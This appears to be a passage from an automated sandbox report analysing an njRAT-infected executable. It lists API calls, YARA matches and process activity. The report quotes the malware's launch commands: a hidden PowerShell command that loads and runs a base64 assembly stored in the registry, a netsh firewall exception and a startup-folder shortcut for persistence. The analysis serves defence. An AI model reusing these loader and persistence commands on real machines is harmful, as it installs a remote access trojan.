Source: C:\Users\user\AppData\Local\Temp\Tr.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\x.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Memory allocated: 770B0000 page execute and read and write Jump to behavior
Contains functionality to communicate with device drivers
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 0_2_00431BE8
Contains functionality to launch a process as a different user
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00446313
Contains functionality to shutdown / reboot the system
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B25264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 1_2_00B25264
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00405264 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, 12_2_00405264
Creates files inside the system directory
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe.tmp Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0042200C 0_2_0042200C
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041A217 0_2_0041A217
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00412216 0_2_00412216
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0042435D 0_2_0042435D
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004033C0 0_2_004033C0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004125E8 0_2_004125E8
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044663B 0_2_0044663B
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004096A0 0_2_004096A0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00413801 0_2_00413801
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0042096F 0_2_0042096F
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004129D0 0_2_004129D0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004119E3 0_2_004119E3
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0041C9AE 0_2_0041C9AE
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0047EA6F 0_2_0047EA6F
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0040FA10 0_2_0040FA10
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00423C81 0_2_00423C81
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00411E78 0_2_00411E78
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00442E0C 0_2_00442E0C
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00420EC0 0_2_00420EC0
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044CF17 0_2_0044CF17
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00444FD2 0_2_00444FD2
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B408E2 1_2_00B408E2
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00ACE800 1_2_00ACE800
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE3307 1_2_00AE3307
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00ACE060 1_2_00ACE060
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD4140 1_2_00AD4140
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE2345 1_2_00AE2345
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B40465 1_2_00B40465
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF6452 1_2_00AF6452
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF25AE 1_2_00AF25AE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE277A 1_2_00AE277A
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD6841 1_2_00AD6841
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF69C4 1_2_00AF69C4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B28932 1_2_00B28932
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B1E928 1_2_00B1E928
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF890F 1_2_00AF890F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD8968 1_2_00AD8968
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AECCA1 1_2_00AECCA1
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF6F36 1_2_00AF6F36
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD70FE 1_2_00AD70FE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD3190 1_2_00AD3190
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AC1287 1_2_00AC1287
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEF359 1_2_00AEF359
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD5680 1_2_00AD5680
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE1604 1_2_00AE1604
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AD58C0 1_2_00AD58C0
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE7813 1_2_00AE7813
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE1AF8 1_2_00AE1AF8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEDAF5 1_2_00AEDAF5
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AF9C35 1_2_00AF9C35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B47E0D 1_2_00B47E0D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00ACFE40 1_2_00ACFE40
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AEBF26 1_2_00AEBF26
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00AE1F10 1_2_00AE1F10
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7F836 4_2_000007FE93D7F836
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D797E8 4_2_000007FE93D797E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D805E2 4_2_000007FE93D805E2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D7F339 4_2_000007FE93D7F339
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93D745C5 4_2_000007FE93D745C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_000007FE93E41416 4_2_000007FE93E41416
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AE800 12_2_003AE800
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_004208E2 12_2_004208E2
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C3307 12_2_003C3307
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AE060 12_2_003AE060
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B4140 12_2_003B4140
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C2345 12_2_003C2345
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00420465 12_2_00420465
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D6452 12_2_003D6452
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D25AE 12_2_003D25AE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C277A 12_2_003C277A
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B6841 12_2_003B6841
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003FE928 12_2_003FE928
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D890F 12_2_003D890F
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B8968 12_2_003B8968
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00408932 12_2_00408932
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D69C4 12_2_003D69C4
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CCCA1 12_2_003CCCA1
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D6F36 12_2_003D6F36
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B70FE 12_2_003B70FE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B3190 12_2_003B3190
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003A1287 12_2_003A1287
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CF359 12_2_003CF359
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C1604 12_2_003C1604
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B5680 12_2_003B5680
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C7813 12_2_003C7813
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003B58C0 12_2_003B58C0
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C1AF8 12_2_003C1AF8
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CDAF5 12_2_003CDAF5
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003D9C35 12_2_003D9C35
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_00427E0D 12_2_00427E0D
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003AFE40 12_2_003AFE40
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003CBF26 12_2_003CBF26
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003C1F10 12_2_003C1F10
Found potential string decryption / allocating functions
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 003C8A80 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 00AE0C63 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 003C0C63 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 00AC7F41 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 003A7F41 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: String function: 00AE8A80 appears 42 times
Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 004115D7 appears 36 times
Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 00416C70 appears 39 times
Source: C:\Users\user\Desktop\._cache_1.exe Code function: String function: 00445AE0 appears 65 times
Sample file is different than original file name gathered from version info
Source: ._cache_1.exe, 00000000.00000003.341152495.0000000000A08000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSHDOCVW.DLL.MUIj% vs ._cache_1.exe
Uses 32bit PE files
Source: ._cache_1.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Yara signature match
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000009.00000002.395438531.0000000002D1A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: RAT_njRat date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects njRAT, reference = http://malwareconfig.com/stats/njRat
Source: 00000004.00000002.872864488.000000000296C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: njrat1 date = 2015-05-27, author = Brian Wallace @botnet_hunter, description = Identify njRat, author_email = bwall@ballastsecurity.net
Source: Process Memory Space: powershell.exe PID: 3276, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3480, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.powershell.exe.2770000.0.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: 9.2.powershell.exe.2db8ea0.1.raw.unpack, A8v5UCNLAwXBSCX02v.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.phis.troj.evad.winEXE@14/16@28/1
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0044AF6C GetLastError,FormatMessageW, 0_2_0044AF6C
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 0_2_004333BE
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_00464EAE OpenProcess,GetLastError,GetLastError,GetCurrentThread,OpenThreadToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,AdjustTokenPrivileges,GetLastError,OpenProcess,AdjustTokenPrivileges,CloseHandle,TerminateProcess,GetLastError,CloseHandle, 0_2_00464EAE
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B184F3 AdjustTokenPrivileges,CloseHandle, 1_2_00B184F3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 1_2_00B18AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 1_2_00B18AA3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003F84F3 AdjustTokenPrivileges,CloseHandle, 12_2_003F84F3
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Code function: 12_2_003F8AA3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, 12_2_003F8AA3
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0045D619 SetErrorMode,GetDiskFreeSpaceW,GetLastError,SetErrorMode, 0_2_0045D619
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_004755C4 CreateToolhelp32Snapshot,Process32FirstW,__wsplitpath,_wcscat,__wcsicoll,Process32NextW,CloseHandle, 0_2_004755C4
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0046E48D CoInitialize,CoCreateInstance,CoUninitialize, 0_2_0046E48D
Source: C:\Users\user\Desktop\._cache_1.exe Code function: 0_2_0043305F __swprintf,__swprintf,__wcsicoll,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx, 0_2_0043305F
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.lnk Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\5cd8f17f4086744065eb0992a09e05a2
Source: C:\Users\user\Desktop\._cache_1.exe File created: C:\Users\user\AppData\Local\Temp\aut512C.tmp Jump to behavior
Source: ._cache_1.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\._cache_1.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: ._cache_1.exe ReversingLabs: Detection: 80%
Source: ._cache_1.exe Virustotal: Detection: 68%
Source: C:\Users\user\Desktop\._cache_1.exe File read: C:\Users\user\Desktop\._cache_1.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\._cache_1.exe "C:\Users\user\Desktop\._cache_1.exe"
Source: C:\Users\user\Desktop\._cache_1.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE
Source: unknown Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start /min powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe"
Source: C:\Users\user\Desktop\._cache_1.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\netsh.exe netsh firewall add allowedprogram "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "powershell.exe" ENABLE Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String((Get-ItemProperty HKCU:\Software).Valuex)).EntryPoint.Invoke($Null,$Null)
Source: C:\Users\user\AppData\Local\Temp\x.exe Process created: C:\Users\user\AppData\Local\Temp\Tr.exe "C:\Users\user\AppData\Local\Temp\Tr.exe" Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: devrtl.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Users\user\Desktop\._cache_1.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wow64cpu.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Tr.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Windows\System32\cmd.exe Section loaded: winbrand.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll Jump to behavior
